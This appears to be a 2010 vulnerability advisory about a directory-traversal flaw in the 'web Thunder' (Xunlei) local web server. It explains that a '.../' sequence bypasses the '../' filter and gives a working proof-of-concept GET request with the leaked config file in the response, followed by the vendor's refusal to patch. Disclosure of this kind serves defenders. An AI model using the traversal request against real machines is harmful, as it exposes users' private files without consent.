web Thunder remote arbitrary file reading vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62201028673
Type myhack58
Reporter Anonymous
Modified 2010-12-24T00:00:00


web Thunder has design and implementation problems that allow a malicious attacker to read any file on the machine of a user who has web Thunder installed.

web Thunder runs a web server on the local machine, bound to 0.0.0.0, and its handling of web requests is flawed: a security defect lets a malicious attacker construct a request that reads any file on the user's machine. Directory traversal with ../ is handled, but .../ bypasses the check (the analysis approach is master T's: black-box analysis with FileMon, and it turns out just the same!).



GET /.../Profiles/UserConfig.ini HTTP/1.1

HTTP/1.0 200 OK
Server: Xunlei Http-Server/1.0
Date: Tue, 23 Nov 2010 09:02:07 GMT
Content-type: *
Content-length: 407
Last-Modified: Tue, 23 Nov 2010 08:43:15 GMT

[Skin]
CurrSkin=default.rar
SkinNames=default.rar
[Monitor]
ExtendNames=.asf;.avi;.exe;.iso;.mp3;.mpeg;.mpg;.mpga;.ra;.rar;.rm;.rmvb;.tar;.wma;.wmp;.wmv;.zip;.torrent;
FilterSitesMax=20
[EMuleGenericSettings]
EMuleWatchLink=1
[Update]
RunUpdate=0
[General]
TaskShowPerPage=11
[Antivirus]
Protect=0
FilePath=
Parameter=
[BHOSection]
StatsDay=2
[develop this program specifically]
SetFolderIcon=1
Path=C:\Xunlei\

send 43, r accepted 579: No sock
C:\Documents and Settings\Administrator>


Vendor reply:

An expert contacted us about this vulnerability very early on. But since the project has not been maintained or updated for a long time, it has not been fixed. Still, thank you very much.

Considering that the project stopped being updated a long time ago, and fewer and fewer people use it, we do not intend to fix this vulnerability.